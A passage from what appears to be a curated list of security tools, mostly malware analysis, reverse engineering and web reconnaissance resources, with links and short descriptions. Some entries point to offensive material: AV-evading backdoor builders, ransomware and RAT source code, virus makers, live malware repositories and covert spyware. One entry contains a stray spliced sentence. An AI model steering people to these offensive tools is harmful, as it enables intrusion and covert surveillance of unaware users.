(also known as Procmon) and PCAP generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These “two” tools cover almost everything a malware analyst might be interested in when doing behavioral malware analysis. 404 | * [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump): It is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. ProcDump also includes hung window monitoring (using the same definition of a window hang that Windows and Task Manager use), unhandled exception monitoring and can generate dumps based on the values of system performance counters. It also can serve as a general process dump utility that you can embed in other scripts.droid. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus. 405 | * [Reflexil](http://reflexil.net/): The .NET Assembly Editor. 406 | * [ResourcesExtract](https://www.nirsoft.net/utils/resources_extract.html): It is a small utility that scans dll/ocx/exe files and extract all resources (bitmaps, icons, cursors, AVI movies, HTML files, and more...) stored in them into the folder that you specify. You can use ResourcesExtract in user interface mode, or alternatively, in command-line mode without displaying any user interface. 407 | * [SharpDllLoader](https://github.com/hexfati/SharpDllLoader): A simple C# executable that invokes an arbitrary method of an arbitrary C# DLL. 408 | * [Shellter](https://www.shellterproject.com/introducing-shellter/): It is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. 409 | * [SysAnalyzer](http://sandsprite.com/iDef/SysAnalyzer/): It is an open source application that was designed to give malcode analysts an automated tool to quickly collect, compare, and report on the actions a binary took while running on the system. 410 | * [TheFatRat](https://github.com/Screetsec/TheFatRat): It is an exploiting tool which compiles a malware with famous payload, and then the compiled malware can be executed on Linux , Windows , Mac and Android. TheFatRat Provides An Easy way to create Backdoors and Payload which can bypass most anti-virus. 411 | * [Windows Sysinternals](https://docs.microsoft.com/en-us/sysinternals/) 412 | * [YARA](https://virustotal.github.io/yara/): YARA is a tool aimed at (but not limited to) helping malware researchers to identify and classify malware samples. 413 | 414 | #### Android 415 | * [APK Decompilers Online](https://www.apkdecompilers.com/) 416 | * [apkleaks](https://github.com/dwisiswant0/apkleaks): Scanning APK file for URIs, endpoints & secrets. 417 | * [apkstudio](https://github.com/vaibhavpandeyvpz/apkstudio): Open-source, cross platform Qt based IDE for reverse-engineering Android application packages. 418 | * [Apktool](https://github.com/iBotPeaches/Apktool): A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications. It also makes working with an app easier because of the project like file structure and automation of some repetitive tasks like building apk, etc. 419 | * [appium](https://github.com/appium/appium): It is an open source test automation framework for use with native, hybrid and mobile web apps. 420 | * [Argus-SAF](https://github.com/arguslab/Argus-SAF): Argus static analysis framework 421 | * [BitBar](https://bitbar.com/): Testing Intelligence for DevOps. 422 | * [Bytecode Viewer](https://github.com/Konloch/bytecode-viewer): A Java 8+ Jar & Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger & More). 423 | * [dexcalibur](https://github.com/FrenchYeti/dexcalibur): Android reverse engineering tool focused on dynamic instrumentation automation. Powered by Frida. It disassembles dex, analyzes it statically, generates hooks, discovers reflected methods, stores intercepted data and does new things from it. Its aim is to be an all-in-one Android reverse engineering platform. 424 | * [drozer](https://github.com/FSecureLABS/drozer): The Leading Security Assessment Framework for Android. 425 | * [fbinfer](https://github.com/facebook/infer): A tool to detect bugs in Java and C/C++/Objective-C code before it ships. 426 | * [frida.re](https://frida.re/docs/android/): Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. 427 | * [Inspeckage](https://github.com/ac-pm/Inspeckage): About 428 | Android Package Inspector - dynamic analysis with api hooks, start unexported activities and more. 429 | * [JEB Decompiler](https://www.pnfsoftware.com/): Decompile and debug binary code. Break down and analyze document files. 430 | Android Dalvik, Intel x86, ARM, MIPS, Java, WebAssembly & Ethereum Decompilers. 431 | * [Mobile Security Framework (MobSF)](https://github.com/MobSF/Mobile-Security-Framework-MobSF): It is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. 432 | * [objection](https://github.com/sensepost/objection): Runtime mobile exploration. 433 | * [Quixxi Vulnerability Scanner](https://vulnerabilitytest.quixxi.com/#/) 434 | * [SandDroid](http://sanddroid.xjtu.edu.cn/#upload): An automatic Android application analysis system. 435 | * [selendroid](http://selendroid.io/): Test automation for native or hybrid Android apps and the mobile web with Selendroid. 436 | * [Sixo Online APK Analyzer](https://www.sisik.eu/apk-tool): This tool allows you to analyze various details about Android APK files. It can decompile binary xml files and resources. 437 | 438 | #### Databases 439 | * [ANY.RUN](https://app.any.run/submissions): Registration required. 440 | * [Contagio Malware Dump](http://contagiodump.blogspot.com/): Curated, password required. 441 | * [CAPE Sandbox](https://capesandbox.com/): Registration required. 442 | * [Das Malwerk](http://dasmalwerk.eu/) 443 | * [Hatching Triage](https://tria.ge/): Registration required. 444 | * [Hybrid Analysis](https://www.hybrid-analysis.com/): Registration required. 445 | * [InQuest Malware Samples](https://github.com/InQuest/malware-samples) 446 | * [ios-malware](https://github.com/ashishb/ios-malware): KeyRaider, OneClick, and XcodeGhost. 447 | * [KernelMode.info](http://www.kernelmode.info/forum/viewforum.php?f=16): Registration required. 448 | * [MalShare](http://malshare.com/): Registration required. 449 | * [MalwareBazaar](https://bazaar.abuse.ch/): MalwareBazaar is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers. 450 | * [MalwareSamples](https://github.com/MalwareSamples/Malware-Feed/) Malware-Feed: Curated. 451 | * [MalwareSourceCode](https://github.com/vxunderground/MalwareSourceCode): About 452 | Collection of malware source code for a variety of platforms in an array of different programming languages. 453 | * [Objective-See Collection](https://objective-see.com/malware.html): Mac malware. 454 | * [PacketTotal](https://packettotal.com/malware-archive.html): Malware inside downloadable PCAP files. 455 | * [PhishingKitTracker](https://github.com/marcoramilli/PhishingKitTracker): Phishing sites source code. 456 | * [PolySwarm](https://polyswarm.network/): Registration required. 457 | * [SNDBOX](https://app.sndbox.com/): Registration required. 458 | * [SoReL-20M](https://github.com/sophos-ai/SOREL-20M): 10M defanged malware samples. 459 | * [theZoo](https://thezoo.morirt.com/): A repository of LIVE malwares for your own joy and pleasure. 460 | * [URLhaus](https://urlhaus.abuse.ch/browse/): Links to live sites hosting malware. 461 | * [VirusBay](https://beta.virusbay.io/): Registration required. 462 | * [VirusShare](https://virusshare.com/): Registration required. 463 | * [VirusSign](https://www.virussign.com/downloads.html): Registration required. 464 | * [Virus and Malware Samples](https://www.virussamples.com/): Includes APT, registration required. 465 | * [vx-underground](https://vx-underground.org/samples.html) 466 | 467 | #### Debuggers / Disassemblers 468 | * [Fiddler](https://www.telerik.com/fiddler) 469 | * [Immunity Debugger](https://www.immunityinc.com/products/debugger/): It is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. 470 | * [OllyDbg](http://www.ollydbg.de/): OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. 471 | * [WinDbg](https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools): Can be used to debug kernel-mode and user-mode code, analyze crash dumps, and examine the CPU registers while the code executes. 472 | * [x64dbg](https://github.com/x64dbg/x64dbg): An open-source x64/x32 debugger for windows. 473 | 474 | #### Decompilers 475 | * [binary.ninja](https://binary.ninja/): Online decompiler. 476 | * [cutter](https://github.com/rizinorg/cutter): Free and Open Source Reverse Engineering Platform powered by rizin. 477 | * [Decompiler](https://www.decompiler.com/): Online decompiler. 478 | * [dnSpy](https://github.com/dnSpy/dnSpy): .NET debugger and assembly editor. 479 | * [Dotnet IL Editor (dile)](https://sourceforge.net/projects/dile/): Dotnet IL Editor (DILE) allows disassembling and debugging .NET 1.0/1.1/2.0/3.0/3.5/4.0 applications without source code or .pdb files. It can debug even itself or the assemblies of the .NET Framework on IL level. 480 | * [dotPeek](https://www.jetbrains.com/es-es/decompiler/): It is a .NET decompiler from JetBrains, the makers of a wide array of developer productivity tools: ReSharper, dotTrace, and dotCover for .NET developers. 481 | * [Ghidra Software Reverse Engineering Framework](https://github.com/NationalSecurityAgency/ghidra): This framework includes a suite of full-featured, high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows, macOS, and Linux. Capabilities include disassembly, assembly, decompilation, graphing, and scripting, along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python. 482 | * [IDA Pro](https://www.hex-rays.com/products/ida/) 483 | * [ILSpy](https://github.com/icsharpcode/ILSpy): ILSpy is the open-source .NET assembly browser and decompiler. 484 | * [Online Disassembler](https://onlinedisassembler.com/odaweb/) 485 | * [radare2](https://github.com/radareorg/radare2): UNIX-like reverse engineering framework and command-line toolset. 486 | * [ScyllaHide](https://github.com/x64dbg/ScyllaHide): ScyllaHide is an advanced open-source x64/x86 user mode Anti-Anti-Debug library. It hooks various functions to hide debugging. This tool is intended to stay in user mode (ring 3). 487 | * [Snowman](https://derevenets.com/): Snowman is a native code to C/C++ decompiler. 488 | * [Telerik JustDecompile](https://www.telerik.com/products/decompiler.aspx): Open Source Decompilation Engine. 489 | * [Tenet - A Trace Explorer for Reverse Engineers](https://github.com/gaasedelen/tenet): Tenet is an IDA Pro plugin for exploring execution traces. The goal of this plugin is to provide more natural, human controls for navigating execution traces against a given binary. The basis of this work stems from the desire to research new or innovative methods to examine and distill complex execution patterns in software. 490 | * [UtinyRipper](https://github.com/mafaca/UtinyRipper): It is a tool for extracting assets from serialized files (CAB-*, *.assets, *.sharedAssets, etc.) and assets bundles (*.unity3d, *.assetbundle, etc.) and conveting them into native Engine format. 491 | * [xAnalyzer](https://github.com/ThunderCls/xAnalyzer): xAnalyzer is a plugin for the x86/x64 x64dbg debugger by @mrexodia. This plugin is based on APIInfo Plugin by @mrfearless, although some improvements and additions have been made. xAnalyzer is capable of doing various types of analysis over the static code of the debugged application to give more extra information to the user. This plugin is going to make an extensive API functions call detections to add functions definitions, arguments and data types as well as any other complementary information, something close at what you get with OllyDbg analysis engine, in order to make it even more comprehensible to the user just before starting the debuggin task. 492 | 493 | #### Deobfuscator 494 | * [de4dot](https://github.com/de4dot/de4dot): .NET deobfuscator and unpacker. 495 | * [XLMMacroDeobfuscator](https://github.com/DissectMalware/XLMMacroDeobfuscator): Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros). 496 | 497 | #### Dependencies 498 | * [DependencyCheck](https://github.com/jeremylong/DependencyCheck): OWASP dependency-check is a software composition analysis utility that detects publicly disclosed vulnerabilities in application dependencies. 499 | * [Dependency Walker](https://www.dependencywalker.com/): It is a free utility that scans any 32-bit or 64-bit Windows module (exe, dll, ocx, sys, etc.) and builds a hierarchical tree diagram of all dependent modules. For each module found, it lists all the functions that are exported by that module, and which of those functions are actually being called by other modules. Another view displays the minimum set of required files, along with detailed information about each file including a full path to the file, base address, version numbers, machine type, debug information, and more. 500 | * [Hakiri](https://hakiri.io/): Monitors Ruby apps for dependency and code security vulnerabilities. 501 | * [RetireJS](https://retirejs.github.io/retire.js/): There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies, but we need to stay update on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10 and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of version with known vulnerabilities. 502 | * [snyk](https://snyk.io/) 503 | 504 | #### Device drivers monitoring 505 | * [DriverView](https://www.nirsoft.net/utils/driverview.html) 506 | 507 | 508 | #### DNS monitoring 509 | * [DNSQuerySniffer](https://www.nirsoft.net/utils/dns_query_sniffer.html): It is a network sniffer utility that shows the DNS queries sent on your system. For every DNS query, the following information is displayed: Host Name, Port Number, Query ID, Request Type (A, AAAA, NS, MX, and so on), Request Time, Response Time, Duration, Response Code, Number of records, and the content of the returned DNS records. 510 | 511 | #### File fingerprinting 512 | * [HashCalc](https://www.slavasoft.com/hashcalc/) 513 | * [HashMyFiles](https://www.nirsoft.net/utils/hash_my_files.html): It is small utility that allows you to calculate the MD5 and SHA1 hashes of one or more files in your system. You can easily copy the MD5/SHA1 hashes list into the clipboard, or save them into text/html/xml file. 514 | * [HashTab](http://implbits.com/products/hashtab/) 515 | * [md5deep and hashdeep](http://md5deep.sourceforge.net/) 516 | * [mimikatz](https://github.com/gentilkiwi/mimikatz): A little tool to play with Windows security. 517 | 518 | #### Files integrity monitoring 519 | * [CSP File Integrity Checker](https://www.cspsecurity.com/solutions/compliance-and-file-monitoring/file-integrity-checker/): FIC delivers a simple yet powerful solution with its file monitoring and reporting capabilities. File monitoring is a critical part of the PCI data security standard to protect confidential (e.g. card-holder) information. 520 | * [Netwrix Auditor](https://www.netwrix.com/auditor.html) 521 | * [NNT Change Tracker](https://www.newnettechnologies.com/change-tracker-gen-7.html): Includes context-based File Integrity Monitoring and File Whitelisting to assure all change activity is automatically analyzed and validated. 522 | * [PA File Sight](https://www.poweradmin.com/products/file-sight/) 523 | * [Verisys](https://www.ionx.co.uk/): File integrity monitoring for Windows, Linux and network devices. 524 | * [Wazuh](https://github.com/wazuh) 525 | 526 | #### Network 527 | * [Capsa Portable Network Analyzer](https://www.colasoft.com/capsa/): Capsa, a portable network performance analysis and diagnostics tool, provides tremendously powerful and comprehensive packet capture and analysis solution with an easy to use interface allowing both veteran and novice users the ability to protect and monitor networks in a critical business environment. Capsa aids in keeping you assessed of threats that may cause significant business outage. 528 | * [CurrPorts](https://www.nirsoft.net/utils/cports.html): It is network monitoring software that displays the list of all currently opened TCP/IP and UDP ports on your local computer. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, and so on), the time that the process was created, and the user that created it. 529 | * [FakeNet](https://sourceforge.net/projects/fakenet/): It is Windows network simulation tool designed for malware analysis. It redirects all traffic leaving a machine to the localhost (including hard-coded IP traffic and DNS traffic) and implements several protocols to ensure that malicious code continues to execute and can be observed by an analyst. 530 | * [GFI LanGuard](https://www.gfihispana.com/products-and-solutions/network-security-solutions/gfi-languard) 531 | * [INetSim](https://www.inetsim.org/downloads.html): It is a software suite for simulating common internet services in a lab environment, e.g. for analyzing the network behaviour of unknown malware samples. 532 | * [NetFlow Traffic Analyzer](https://www.solarwinds.com/es/netflow-traffic-analyzer) 533 | * [Netfort](https://www.netfort.com/) 534 | * [Port Monitor](https://port-monitor.com/) 535 | * [PRTG Network Monitor](https://www.es.paessler.com/prtg) 536 | * [TCPView](https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview): It is a Windows program that will show you detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections. 537 | * [Wireshark](https://www.wireshark.org/) 538 | 539 | #### Packers 540 | * [.NET Generic Unpacker](https://ntcore.com/?page_id=353): This is a program to dump .NET packed applications. Of course no serious .NET protection relies on packing. In fact, this software shows how easily you can unpack a protected assemly. This .NET Generic Unpacker was written in a couple of hours and despite of the fact that it’s very simple, it might turn useful having it: otherwise you have to unpack manually, which is quite easy as well. 541 | * [ASL](https://github.com/ExeinfoASL/ASL): Detect packer , compiler , protector , .NET obfuscator. 542 | * [ASPack](http://aspack.com/): It is an advanced EXE packer created to compress Win32 executable files and to protect them against non-professional reverse engineering. 543 | * [https://github.com/horsicq/Detect-It-Easy](https://github.com/horsicq/Detect-It-Easy): Program for determining types of files for Windows, Linux and MacOS. 544 | * [PEiD](https://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/PEiD-updated.shtml): It is an intuitive application that relies on its user-friendly interface to detect packers, cryptors and compilers found in PE executable files – its detection rate is higher than that of other similar tools since the app packs more than 600 different signatures in PE files. 545 | * [macro_pack](https://github.com/sevagas/macro_pack): The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats. 546 | * [RDG Packer Detector](http://www.rdgsoft.net/): It is a detector for packers, ciphers, compilers, packers, encoders, assemblers, installers. 547 | * [UPX the Ultimate Packer for eXecutables](https://upx.github.io/): It is a free, portable, extendable, high-performance executable packer for several executable formats. 548 | 549 | #### Portable Executable (PE) explorer 550 | * [CFF Explorer](https://ntcore.com/?page_id=388): CFF Explorer was designed to make PE editing as easy as possible, but without losing sight on the portable executable’s internal structure. 551 | * [Detect It Easy (DiE)](https://horsicq.github.io/): Determining types of files. 552 | * [dllcharacteristics.py](https://github.com/accidentalrebel/dllcharacteristics.py): A simple Python tool for getting and setting the values of DLL characteristics for PE files. 553 | * [Exeinfo PE](http://exeinfo.atwebpages.com/) 554 | * [Lord PE](https://www.aldeid.com/wiki/LordPE): LordPE is a tool for system programmers/reverse engineers which is able to edit/view many parts of PE (Portable Executable) files, dump them from memory, optimize them, validate, analyze, edit, etc. 555 | * [PE Explorer](http://www.heaventools.com/overview.htm): Lets you open, view and edit a variety of different 32-bit Windows executable file types (also called PE files) ranging from the common, such as EXE, DLL and ActiveX Controls, to the less familiar types, such as SCR (Screensavers), CPL (Control Panel Applets), SYS, MSSTYLES, BPL, DPL and more (including executable files that run on MS Windows Mobile platform). 556 | * [PE-bear](https://github.com/hasherezade/pe-bear-releases): PE-bear is a freeware reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files. 557 | * [pefile](https://github.com/erocarrera/pefile): It is a Python module to read and work with PE (Portable Executable) files. 558 | * [PEframe](https://github.com/guelfoweb/peframe): It is a open source tool to perform static analysis on Portable Executable malware and malicious MS Office documents. 559 | * [PeNet](https://github.com/secana/PeNet): It is a parser for Windows Portable Executable headers. It completely written in C# and does not rely on any native Windows APIs. Furthermore it supports the creation of Import Hashes (ImpHash), which is a feature often used in malware analysis. You can extract Certificate Revocation List, compute different hash sums and other useful stuff for working with PE files. 560 | * [PeNet Web](https://penet.azureedge.net/): PeNet Web is an online Portable Executable viewer. It displays fields and additional information from uploaded PE files. The project is based on the PeNet library. 561 | * [pestudio](https://www.winitor.com/features): The goal of pestudio is to spot artifacts of executable files in order to ease and accelerate Malware Initial Assessment. The tool is used by Computer Emergency Response (CERT) teams, Security Operations Centers (SOC) and Labs worldwide. 562 | * [PeView](http://wjradburn.com/software/): Provides a quick and easy way to view the structure and content of 32-bit Portable Executable (PE) and Component Object File Format (COFF) files. This PE/COFF file viewer displays header, section, directory, import table, export table, and resource information within EXE, DLL, OBJ, LIB, DBG, and other file types. 563 | * [PortEx](https://github.com/katjahahn/PortEx): Java library to analyse Portable Executable files with a special focus on malware analysis and PE malformation robustness. 564 | * [Portable Executable Scanner (pescan)](https://tzworks.net/prototype_page.php?proto_id=15): It is a command line tool to scan portable executable (PE) files to identify how they were constructed. 565 | * [PPEE (puppy)](https://www.mzrst.com/): It is a Professional PE file Explorer for reversers, malware researchers and those who want to statically inspect PE files in more details. 566 | * [Resource Hacker](http://www.angusj.com/resourcehacker/): It is a resource editor for 32bit and 64bit Windows® applications. It's both a resource compiler (for *.rc files), and a decompiler - enabling viewing and editing of resources in executables (*.exe; *.dll; *.scr; etc) and compiled resource libraries (*.res, *.mui). While Resource Hacker™ is primarily a GUI application, it also provides many options for compiling and decompiling resources from the command-line. 567 | 568 | #### Ransomware 569 | * [ransomware-sources](https://github.com/theanonhackuk/ransomware-sources): Collection of source code of some ransomware on Github. 570 | 571 | #### RATs 572 | * [RAT-NjRat-0.7d-modded-source-code](https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code) 573 | 574 | #### Scanners / Sandbox 575 | * [Cuckoo](https://cuckoosandbox.org/): You can throw any suspicious file at it and in a matter of minutes Cuckoo will provide a detailed report outlining the behavior of the file when executed inside a realistic but isolated environment. 576 | * [Hybrid Analysis](): This tool allows sending a file to different scanners in parallel: VirusTotal, MetaDefender and CrowdStrike Falcon. Send samples. 577 | * [jotti](https://www.virustotal.com/gui/): Simple online scanner that returns the scan results of a number of antivirus scanners, as well as some basic information about the file. Send samples. 578 | * [KIMS](https://github.com/xchwarze/KIMS): KIMS was the first local and web multi scan of the world which last version came out on 2006 programed by Thor. In 2009 it began being developed to the new version by DSR!. 579 | * [Malice.IO](https://github.com/maliceio): VirusTotal Wanna Be - Now with 100% more Hipster. 580 | * [MalwareAnalysis.co](https://malwareanalysis.co/sandboxes/) 581 | * [NoDistribute](https://nodistribute.com/) 582 | * [Noriben](https://github.com/Rurik/Noriben): Portable, Simple, Malware Analysis Sandbox. 583 | * [thor-av-multiscanner](https://github.com/Lifka/thor-av-multiscanner): Static analysis of malware using Docker. This software allows you to scan a file with different antivirus engines. Also, it allows obtaining information from a file; such as imported libraries, PE, hashes, etc. 584 | * [Valkyrie Sandbox](https://valkyrie.comodo.com/): It is a file verdict system. Different from traditional signature based malware detection techniques Valkyrie conducts several analysis using run-time behavior and hundreds of features from a file and based on analysis results can warn users against malware undetected by classic Anti-Virus products. 585 | * [VirusTotal](https://www.virustotal.com/gui/): Analyze suspicious files and URLs to detect types of malware, automatically share them with the security community. Displays information on static and dynamic analysis. Send samples. 586 | 587 | #### Spyware 588 | * [ACTIVTrack](https://activtrak.com) 589 | * [Spytech SpyAgent](https://www.spytech-web.com/spyagent.shtml): Allows you to monitor and record EVERYTHING users do on your computer - in total stealth. SpyAgent provides an unrivaled set of essential computer monitoring features, as well as website and application content filtering, chat client blocking, real-time activity alerts, and remote delivery of logs via email or FTP. 590 | * [NetVizor](https://www.netvizor.net) 591 | * [Power Spy](https://ematrixsoft.com/power-spy-software.php): It is a computer activity monitoring software that allows you to secretly log all users on a PC while they are unaware. After the software is installed on the PC, you can remotely receive log reports on any device via email or FTP. You can check these reports as soon as you receive them or at any convenient time. You can also directly check logs using the log viewer on the monitored PC. 592 | * [SoftActivity Monitor](https://www.softactivity.com) 593 | * [Veriato Cerebral](https://www.veriato.com) 594 | 595 | #### String search 596 | * [BinText](https://www.aldeid.com/wiki/BinText): A small, very fast and powerful text extractor that will be of particular interest to programmers. It can extract text from any kind of file and includes the ability to find plain ASCII text, Unicode (double byte ANSI) text and Resource strings, providing useful information for each item in the optional "advanced" view mode. Its comprehensive filtering helps prevent unwanted text being listed. The gathered list can be searched and saved to a separate file as either a plain text file or in informative tabular format. 597 | * [FireEye Labs Obfuscated String Solver](https://github.com/fireeye/flare-floss): Automatically extract obfuscated strings from malware. 598 | * [Strings](https://docs.microsoft.com/en-us/sysinternals/downloads/strings) 599 | * [stringsifter](https://github.com/mandiant/stringsifter): A machine learning tool that ranks strings based on their relevance for malware analysis. 600 | 601 | #### Virus 602 | * [DELmE's Batch Virus Maker](https://github.com/hacktoolspack/hack-tools/tree/master/DELmE's%20Batch%20Virus%20Maker%20v%202.0) 603 | * [JPS Virus Maker](http://www.solidfiles.com/v/DKy7Xd6Rgrj8x) 604 | 605 | #### Windows registry monitoring 606 | * [Autoruns for Windows](https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns): This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login, and when you start various built-in Windows applications like Internet Explorer, Explorer and media players. These programs and drivers include ones in your startup folder, Run, RunOnce, and other Registry keys. Autoruns reports Explorer shell extensions, toolbars, browser helper objects, Winlogon notifications, auto-start services, and much more. Autoruns goes way beyond other autostart utilities. 607 | * [Registrar Registry Manager](https://www.resplendence.com/registrar): It is an advanced and complete suite of tools that allows you to safely maintain your local registry as well as the registries on the systems of your network. Since many years, Registrar Registry Manager has been the expert's choice in registry management. 608 | * [Registry Viewer](https://accessdata.com/product-download/registry-viewer-2-0-0) 609 | * [Reg Organizer](https://www.chemtable.com/organizer.htm): The utility allows you to remove unwanted programs from the system and search for traces of the uninstalled program. If there are “heavy” programs that run automatically on start-up in your Windows operating system, disabling them in an advanced startup manager can in some cases speed up the boot time and operation of your operating system. The disk cleanup feature frees up space on your system disk. And this is only part of features in the utility. 610 | * [RegScanner](https://www.nirsoft.net/utils/regscanner.html): Is a small utility that allows you to scan the Registry, find the desired Registry values that match to the specified search criteria, and display them in one list. After finding the Registry values, you can easily jump to the right value in RegEdit, simply by double-clicking the desired Registry item. You can also export the found Registry values into a .reg file that can be used in RegEdit. 611 | * [regshot](https://sourceforge.net/projects/regshot/): Regshot is an open-source (LGPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one - done after doing system changes or installing a new software product. 612 | 613 | #### Windows services monitoring 614 | * [Advanced Windows Service Manager](https://securityxploded.com/winservicemanager.php): It is the specialized software for smarter analysis of Windows Services. It offers many powerful and unique features which sets it apart from built-in Service Management Console as well as other similar softwares. 615 | * [AnVir Task Manager](https://www.anvir.com/): Control everything running on computer, remove Trojans, speed up computer. 616 | * [Netwrix Service Monitor](https://www.netwrix.com/windows_services_monitoring_freeware.html): Freeware service monitoring tool that enables you to monitor Windows services on your critical servers. 617 | * [PA File Sight](https://www.poweradmin.com/products/file-sight/licensing-and-pricing/) 618 | * [Process Hacker](https://processhacker.sourceforge.io/) 619 | * [Service+](https://www.activeplus.com/products/serviceplus) 620 | * [SrvMan](https://sysprogs.com/legacy/tools/srvman/): Windows Service Manager is a small tool that simplifies all common tasks related to Windows services. It can create services (both Win32 and Legacy Driver) without restarting Windows, delete existing services and change service configuration. It has both GUI and Command-line modes. It can also be used to run arbitrary Win32 applications as services (when such service is stopped, main application window is closed automatically). 621 | 622 | 623 | 624 | --- 625 | 626 | 627 | 628 | ### Session hijacking 629 | * [Burp Suite](https://portswigger.net/burp) 630 | * [bettercap](https://github.com/bettercap/bettercap): The Swiss Army knife for 802.11, BLE and Ethernet networks reconnaissance and MITM attacks. 631 | * [netool toolki](https://sourceforge.net/projects/netoolsh/): MitM pentesting opensource toolkit. 632 | * [OWASP ZAP](https://www.zaproxy.org/): It is an integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. ZAP allows you to see all the requests you make to a web app and all the responses you receive from it. Among other things, it allows you to see AJAX calls that may not otherwise be outright visible. You can also set breakpoints, which allow you to change the requests and responses in real-time. 633 | * [https://github.com/moxie0/sslstrip](https://github.com/moxie0/sslstrip): A tool for exploiting Moxie Marlinspike's SSL "stripping" attack. 634 | * [WebSploit Framework](https://sourceforge.net/projects/websploit/) 635 | 636 | #### Android 637 | * [DroidSheep](https://droidsheep.info/): It is an open-source Android application made by Corsin Camichel that allows you to intercept unprotected web-browser sessions using WiFi. 638 | * [DroidSniff](https://github.com/evozi/DroidSniff): It is an Android app for Security analysis in wireless networks and capturing facebook, twitter, linkedin and other accounts.rotected web-browser sessions using WiFi. 639 | * [FaceNiff](http://faceniff.ponury.net/): It is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It's kind of like Firesheep for android. Maybe a bit easier to use (and it works on WPA2!). 640 | 641 | 642 | 643 | --- 644 | 645 | 646 | 647 | ### Hacking web 648 | * [DirBuster](https://sourceforge.net/projects/dirbuster/): It is a multi threaded java application designed to brute force directories and files names on web/application servers. 649 | * [Ghost Eye](https://github.com/BullsEye0/ghost_eye): It is an information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP. 650 | * [httprecon](https://w3dt.net/tools/httprecon): It is a tool for advanced web server fingerprinting. This tool performs banner-grabbing attacks, status code enumeration, and header ordering analysis on its target web server. 651 | * [ID Serve](https://www.grc.com/id/idserve.htm): It is a simple Internet server identification utility. Following is a list of its capabilities: HTTP server identification, Non-HTTP server identification, Reverse DNS lookup. 652 | * [skipfish](https://code.google.com/archive/p/skipfish/): Is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments. 653 | 654 | #### Footprinting 655 | * [More tools](#website-footprinting) 656 | 657 | ##### Whois lookup 658 | * [IP Converter](http://www.sabsoft.com) 659 | * [Netcraft](https://www.netcraft.com/) 660 | * [SmartWhois](https://www.tamos.com) 661 | * [WHOIS Lookup](http://whois.domaintools.com) 662 | 663 | ##### DNS interrogation 664 | * [DNSRecon](https://github.com/darkoperator/dnsrecon) 665 | * [DNS Records](https://network-tools.com/dns-records/) 666 | * [Domain Dossier](https://centralops.net/co/) 667 | * [Toolset](https://tools.dnsstuff.com) 668 | 669 | ##### Scan ports and services running 670 | * [Nmap](https://github.com/nmap/nmap) 671 | * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) 672 | 673 | ##### Web Application Reconnaissance 674 | * telnet 675 | * [WhatWeb](https://github.com/urbanadventurer/WhatWeb) 676 | 677 | ##### Web spidering 678 | * [OWASP Zed Attack Proxy (ZAP)](https://owasp.org/www-project-zap/): Integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually. 679 | 680 | ##### Detect load balancer 681 | * [dig](https://github.com/polarityio/dig): Network admin tool for querying DNS servers. 682 | * [halberd](https://github.com/jmbr/halberd): discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing. 683 | * [load balancing detector (lbd)](https://github.com/craig/ge.mine.nu/tree/master/lbd): Detects if a given domain uses DNS and/or HTTP Load-Balancing (via Server: and Date: header and diffs between server answers). 684 | 685 | ##### Identify web server directories 686 | * [Gobuster](https://github.com/OJ/gobuster): Directory/File, DNS and VHost busting tool written in Go. 687 | * [Nmap](https://github.com/nmap/nmap) 688 | 689 | ##### Identify web application vulnerabilities 690 | * [acunetix](https://www.acunetix.com/) 691 | * [appscan](https://www.hcltechsw.com/products/appscan) 692 | * [appspider](https://www.rapid7.com/products/appspider/): Web application security testing to close the gaps in your apps. 693 | * [arachni](https://github.com/Arachni/arachni): Web Application Security Scanner Framework. 694 